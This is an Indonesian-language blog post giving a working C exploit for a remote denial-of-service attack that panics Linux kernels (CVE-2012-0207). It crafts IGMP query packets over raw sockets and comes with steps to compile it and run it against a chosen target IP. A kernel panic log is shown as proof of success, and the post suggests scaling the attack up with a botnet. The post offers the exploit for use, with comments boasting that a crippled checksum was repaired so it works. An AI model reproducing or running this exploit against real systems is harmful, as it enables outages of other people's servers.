Denial Of Service [DoS] Linux Kernel 2.6.36

Sabtu, 31 Maret 2012

Share This Article On :
Kali ini kami akan berbagi mengenai bagaimana cara DoS menggunakan tools berikut terhadap linux server. DOS kali ini akan menggunakan kelemahan pada bugs IGMP.

Oke yang perlu dipersiapkan adalah:
  1. Siapkan server / pc untuk mengcompile source ddos.
  2. Siapkan pc target linux, bisa random / yang memiliki kernel 2.6.36
  3. Memulai attack :)
Berikut adalah code DoS tools:
C
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
/*
** attacklinux.c
** Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)
** CVE-2012-0207
** Credits to Ben Hutchings:
** THIS code wich can attack NOT just LAN, is NOT kcopes and, is based more on the ICMPv3 membership query bug... wich was for windows but also affects linux, in IMPv3 tho go figure... anyhow, this can now be easily made into a very fast packet machine ,and since it doesnt care what the ips are, i guess could be seen results, remotely... feel free to update/send in comment... all comments, go thru ME, XD , before any type of publishing, so be sure that codes are safe and, i only put here, corrected codes...simple... so, please dont go adding it to your lame d0s collection coz, ill just fark it up , and, i mean, the packet is easy to block since it is released...right
XD loves u all
** Example:
** ./attacklinux SRC_IP DST_IP
** The Linux Kernel at the remote side will Panic
** when sent over the network -still in testing!
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>
struct iphdr {
unsigned char ihl:4, version:4, tos;
unsigned short tot_len, id, frag_off;
unsigned char ttl, protocol;
unsigned short check;
unsigned int saddr, daddr;
unsigned int options1;
unsigned int options2;
};
struct igmp_query {
unsigned char type;
unsigned char maxresponse;
unsigned short csum;
unsigned int mcast;
char padding[40];
};
// unsigned short in_chksum(unsigned short *, int); // removed by xd , thx for trying to cripple but no work
unsigned short in_chksum(unsigned short *addr, int len); // this was crippled, notice that this was uptop, so you dd not see the
// bugged up in_chksum wich wont make this works <img src="http://crazycoders.com/wp-includes/images/smilies/icon_smile.gif" alt=":)"> NOW try it.
unsigned short in_chksum(unsigned short *addr, int len) {
register int nleft = len;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *addr++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&amp;answer) = *(u_char *)addr;
sum += answer;
}
sum = (sum >> 16) + (sum &amp; 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
long resolve(char *);
long resolve(char *host) {
struct hostent *hst;
long addr;
hst = gethostbyname(host);
if (hst == NULL)
return(-1);
memcpy(&amp;addr, hst->h_addr, hst->h_length);
return(addr);
}
int main(int argc, char *argv[]) {
struct sockaddr_in dst;
struct iphdr *ip;
struct igmp_query *igmp;
long daddr, saddr;
int s, i=0, c, len, one=1;
char buf[1500];
if (argc < 3) {
printf("Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)\n"
"credits to Ben Hutchings but this is NOT kcopes code nor firestorms so, author stays anon\n");
printf("Usage: %s <src ip> <dst ip>\n", *argv); // yea, try any ip and see, i guess its worth a shot... or not <img src="http://crazycoders.com/wp-includes/images/smilies/icon_razz.gif" alt=":P">
return(1);
}
daddr = resolve(argv[2]);
saddr = resolve(argv[1]);
memset(buf, 0, 1500);
ip = (struct iphdr *)&amp;buf;
igmp = (struct igmp_query*)&amp;buf[sizeof(struct iphdr)];
dst.sin_addr.s_addr = daddr;
dst.sin_family = AF_INET;
ip->ihl = 7;
ip->version = 4;
ip->tos = 0;
ip->tot_len = htons(sizeof(struct iphdr)+8);
ip->id = htons(18277);
ip->frag_off=0;
ip->ttl = 1;
ip->protocol = IPPROTO_IGMP;
ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr));
ip->saddr = saddr;
ip->daddr = daddr;
ip->options1 = 0;
ip->options2 = 0;
igmp->type = 0x11;
igmp->maxresponse = 0xff;
igmp->mcast=inet_addr("0.0.0.0"); // mod here ,now we can attack the IP we actually put in
igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
igmp->csum=in_chksum((unsigned short *)igmp, 8);
s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (s == -1)
return(1);
printf("Sending IGMP packet: %s -> %s\n", argv[1], argv[2]);
if (sendto(s,&amp;buf,sizeof(struct iphdr)+8,0,(struct sockaddr *)&amp;dst,sizeof(struct sockaddr_in)) == -1) {
perror("Error sending packet");
exit(-1);
}
close(s);
s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (s == -1)
return(1);
ip->id = htons(18278);
ip->tot_len = sizeof(struct iphdr)+12;
igmp->type = 0x11;
igmp->maxresponse = 0;
igmp->mcast=inet_addr("0.0.0.0");
igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
igmp->csum=in_chksum((unsigned short *)igmp, 12);
printf("Sending packet: %s -> %s\n", argv[1], argv[2]);
if (sendto(s,&amp;buf,sizeof(struct iphdr)+12,0,(struct sockaddr *)&amp;dst,sizeof(struct sockaddr_in)) == -1) {
perror("Error sending packet");
exit(-1);
}
return(0);
}
Cara menjalankannya adalah
  1. Simpan code di atas dengan nama file: dos-linux.c
  2. Compile source diatas menggunakan gcc: gcc dos-linux.c -o attacklinux
  3. Kemudian setelah selesai jalankan dengan perintah: ./attacklinux source_ip destination_ip , misal: ./attacklinux 127.0.0.1 10.10.10.10
Download Source Code Toolsnya Disini:
Apabila berhasil, maka pada server akan tampil error log seperti berikut:
Shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
binushacker $ gcc dos-linux.c -o attacklinux
binushacker $ ./attacklinux 127.0.0.1 10.10.10.10
[ 274.903179] netconsole: local IP 0.0.0.0
[ 274.903181] netconsole: interface 'eth0'
[ 274.903185] netconsole: remote IP 10.10.10.10
[ 274.903191] netconsole: local IP 127.0.0.1
[ 274.903244] console [netcon0] enabled
[ 274.903247] netconsole: network logging started
[ 283.360160] usb 4-2: new full speed USB device number 4 using uhci_hcd
[ 283.526265] usb 4-2: New USB device found, idVendor=0a5c, idProduct=2145
[ 283.526280] usb 4-2: New USB device strings: Mfr=1, Product=2, SerialNumber=0
[ 283.526289] usb 4-2: Product: ThinkPad Bluetooth with Enhanced Data Rate II
[ 283.526297] usb 4-2: Manufacturer: Lenovo Computer Corp
[ 2171.144135] usb 4-2: USB disconnect, device number 4
[ 2178.490539] wlan0: deauthenticating from 10.10.10.10 by local choice (reason=3)
[ 2178.506572] cfg80211: Calling CRDA to update world regulatory domain
[ 2178.523720] cfg80211: World regulatory domain updated:
[ 2178.523741] cfg80211: (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp)
[ 2178.523752] cfg80211: (2402000 KHz - 2472000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
[ 2178.523762] cfg80211: (2457000 KHz - 2482000 KHz @ 20000 KHz), (300 mBi, 2000 mBm)
[ 2178.523772] cfg80211: (2474000 KHz - 2494000 KHz @ 20000 KHz), (300 mBi, 2000 mBm)
[ 2178.523781] cfg80211: (5170000 KHz - 5250000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
[ 2178.523791] cfg80211: (5735000 KHz - 5835000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
[ 4622.662356] iwlagn 0000:03:00.0: L1 Disabled; Enabling L0S
[ 4622.662756] iwlagn 0000:03:00.0: Radio type=0x0-0x2-0x0
[ 4622.717229] ADDRCONF(NETDEV_UP): wlan0: link is not ready
[ 4630.334443] wlan0: authenticate with 10.10.10.10 (try 1)
[ 4630.336213] wlan0: authenticated
[ 4630.340174] wlan0: associate with 10.10.10.10 (try 1)
[ 4630.356310] wlan0: RX AssocResp from 10.10.10.10 (capab=0x431 status=0 aid=2)
[ 4630.356318] wlan0: associated
[ 4630.362820] ADDRCONF(NETDEV_CHANGE): wlan0: link becomes ready
[ 4640.576058] wlan0: no IPv6 routers present
[ 7853.283020] Monitor-Mwait will be used to enter C-3 state
[ 7853.285825] thinkpad_acpi: EC reports that Thermal Table has changed
[16107.346657] thinkpad_acpi: EC reports that Thermal Table has changed
[16111.048524] divide error: 0000 [#1] SMP
[16111.048627] CPU 1
[16111.048664] Modules linked in: netconsole configfs ip6table_filter ip6_tables ebtable_nat ebtables ipt_MASQUERADE iptable_nat nf_nat nf_conntrack_ipv4 nf_defrag_ipv4 xt_state nf_conntrack ipt_REJECT xt_CHECKSUM acpi_cpufreq mperf iptable_mangle cpufreq_powersave cpufreq_conservative xt_tcpudp iptable_filter cpufreq_stats ip_tables x_tables cpufreq_userspace bridge stp parport_pc ppdev lp parport bnep rfcomm binfmt_misc deflate ctr twofish_generic twofish_x86_64 twofish_common camellia serpent blowfish cast5 des_generic xcbc rmd160 sha512_generic sha1_generic hmac crypto_null af_key ext2 fuse loop kvm_intel kvm ecb btusb bluetooth snd_hda_codec_conexant crc16 uvcvideo videodev snd_hda_intel media cdc_ether snd_hda_codec v4l2_compat_ioctl32 usbnet cdc_acm mii snd_hwdep cdc_wdm arc4 snd_pcm_oss snd_mixer_oss snd_pcm thinkpad_acpi snd_seq_midi snd_rawmidi iwlagn snd_seq_midi_event mac80211 cfg80211 snd_seq snd_timer snd_seq_device iTCO_wdt i2c_i801 snd snd_page_alloc iTCO_vendor_support rfkill i915 drm_kms_helper drm soundcore i2c_algo_bit tpm_tis psmouse tpm i2c_core wmi battery pcspkr tpm_bios ac nvram power_supply evdev serio_raw video processor button ext3 jbd mbcache btrfs zlib_deflate crc32c libcrc32c cbc dm_snapshot dm_mirror dm_region_hash dm_log dm_crypt dm_mod cryptd aes_x86_64 aes_generic sha256_generic sd_mod crc_t10dif uhci_hcd ata_generic thermal thermal_sys ahci libahci ehci_hcd libata e1000e scsi_mod usbcore [last unloaded: scsi_wait_scan]
[16111.051698]
[16111.051732] Pid: 5416, comm: NetworkManager Not tainted 3.1.0-1-amd64 #1 LENOVO 74663RG/74663RG
[16111.051888] RIP: 0010:[<ffffffff812bf78c>] [<ffffffff812bf78c>] igmp_start_timer+0x1a/0x47
[16111.052013] RSP: 0018:ffff88013bc83ab0 EFLAGS: 00010246
[16111.052013] RAX: 000000000efb921d RBX: ffff8801347932c0 RCX: 00000001003c507a
[16111.052013] RDX: 0000000000000000 RSI: 0000000056000000 RDI: ffff8801347932f8
[16111.052013] RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000
[16111.052013] R10: 0000000000000000 R11: 0000000000000000 R12: ffff8801363ca480
[16111.052013] R13: 00000000fb0000e0 R14: 0000000000000000 R15: 0000000000000000
[16111.052013] FS: 00007f3909c057e0(0000) GS:ffff88013bc80000(0000) knlGS:0000000000000000
[16111.052013] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[16111.052013] CR2: 00007f3906e2449b CR3: 00000001097a2000 CR4: 00000000000006e0
[16111.052013] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[16111.052013] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[16111.052013] Process NetworkManager (pid: 5416, threadinfo ffff880116fe0000, task ffff8800af283510)
[16111.052013] Stack:
[16111.052013] ffff8801347932f8 ffff8801347932c0 ffff8800373cc3c0 ffffffff812c166e
[16111.052013] 0000000000000000 ffff8801347932f8 ffff880134793350 0000000000000000
[16111.052013] 0002000000000000 ffff8800373cc3c0 ffffffff817f8280 0000000000000002
[16111.052013] Call Trace:
[16111.052013] <IRQ>
[16111.052013] [<ffffffff812c166e>] ? igmp_rcv+0x480/0x515
[16111.052013] [<ffffffff81297cdf>] ? ip_local_deliver_finish+0x137/0x1a4
[16111.052013] [<ffffffff8126f54f>] ? __netif_receive_skb+0x3e3/0x415
[16111.052013] [<ffffffff81270dc0>] ? netif_receive_skb+0x63/0x69
[16111.052013] [<ffffffffa03c4775>] ? ieee80211_frame_allowed+0x68/0xc3 [mac80211]
[16111.052013] [<ffffffffa03c4b33>] ? ieee80211_deliver_skb+0xbb/0xf1 [mac80211]
[16111.052013] [<ffffffffa03c5d67>] ? ieee80211_rx_handlers+0xf19/0x1755 [mac80211]
[16111.052013] [<ffffffff81291f5d>] ? nf_iterate+0x41/0x77
[16111.052013] [<ffffffff81297804>] ? inet_del_protocol+0x27/0x27
[16111.052013] [<ffffffffa03c6d15>] ? ieee80211_prepare_and_rx_handle+0x772/0x7ca [mac80211]
[16111.052013] [<ffffffffa03c7440>] ? ieee80211_rx+0x6d3/0x6f8 [mac80211]
[16111.052013] [<ffffffffa03f04b6>] ? iwl_rx_reply_rx+0x429/0x441 [iwlagn]
[16111.052013] [<ffffffff811acff2>] ? is_swiotlb_buffer+0x23/0x2f
[16111.052013] [<ffffffffa03f61b4>] ? iwl_irq_tasklet+0x3cb/0x645 [iwlagn]
[16111.052013] [<ffffffff8104afe0>] ? raise_softirq_irqoff+0x6/0x25
[16111.052013] [<ffffffff8104a52a>] ? tasklet_action+0x73/0xc2
[16111.052013] [<ffffffff8104ad14>] ? __do_softirq+0xb9/0x177
[16111.052013] [<ffffffff81334a2c>] ? call_softirq+0x1c/0x30
[16111.052013] [<ffffffff8100f845>] ? do_softirq+0x3c/0x7b
[16111.052013] [<ffffffff8104af7c>] ? irq_exit+0x3c/0x9a
[16111.052013] [<ffffffff8100f575>] ? do_IRQ+0x82/0x98
[16111.052013] [<ffffffff8132db2e>] ? common_interrupt+0x6e/0x6e
[16111.052013] <EOI>
[16111.052013] [<ffffffff810b6195>] ? get_page_from_freelist+0x2b2/0x665
[16111.052013] [<ffffffff810b6043>] ? get_page_from_freelist+0x160/0x665
[16111.052013] [<ffffffff810b67d4>] ? __alloc_pages_nodemask+0x12b/0x748
[16111.052013] [<ffffffff810b6d89>] ? __alloc_pages_nodemask+0x6e0/0x748
[16111.052013] [<ffffffff810df014>] ? alloc_pages_current+0xb2/0xcc
[16111.052013] [<ffffffff8102f6fd>] ? pte_alloc_one+0x11/0x39
[16111.052013] [<ffffffff810ca1c6>] ? __pte_alloc+0x19/0x11e
[16111.052013] [<ffffffff810cc42e>] ? handle_mm_fault+0x18d/0x1ea
[16111.052013] [<ffffffff813307c0>] ? do_page_fault+0x312/0x337
[16111.052013] [<ffffffff810b9389>] ? put_page+0x18/0x27
[16111.052013] [<ffffffff810ca93b>] ? do_wp_page+0x551/0x563
[16111.052013] [<ffffffff810cc0b7>] ? handle_pte_fault+0x739/0x79f
[16111.052013] [<ffffffff8132ddf5>] ? page_fault+0x25/0x30
[16111.052013] [<ffffffff811a2ca3>] ? __strncpy_from_user+0x32/0x48
[16111.052013] [<ffffffff811a2c89>] ? __strncpy_from_user+0x18/0x48
[16111.052013] [<ffffffff810fc331>] ? getname_flags+0x152/0x1d7
[16111.052013] [<ffffffff810148a5>] ? sys_execve+0x1a/0x54
[16111.052013] [<ffffffff81332c2c>] ? stub_execve+0x6c/0xc0
[16111.052013] Code: 0c 58 48 8d 7b 08 5b 5d e9 5a f8 ff ff 58 5b 5d c3 55 89 f5 53 48 89 fb 52 e8 b4 3d ee ff 31 d2 48 8b 0d 78 08 3d 00 48 8d 7b 38 <f7> f5 c6 83 94 00 00 00 01 48 63 d2 48 8d 74 11 02 e8 bb 24 d9
[16111.052013] RIP [<ffffffff812bf78c>] igmp_start_timer+0x1a/0x47
[16111.052013] RSP <ffff88013bc83ab0>
[16111.168911] ---[ end trace 3945f5f1af3c1493 ]---
[16111.168922] Kernel panic - not syncing: Fatal exception in interrupt
[16111.171624] Pid: 5416, comm: NetworkManager Tainted: G D 3.1.0-1-amd64 #1
[16111.174416] Call Trace:
binushacker $
DoS dengan IGMP ini juga bisa dilakukan di DDOS, apabila kalian memiliki BOTNET :)
Selamat mencoba semoga berhasil..

Tidak ada komentar:

Posting Komentar

 
© Copyright 2010-2011 Media Pengetahuan All Rights Reserved.
Template Design by Herdiansyah Hamzah | Published by Borneo Templates | Powered by Blogger.com.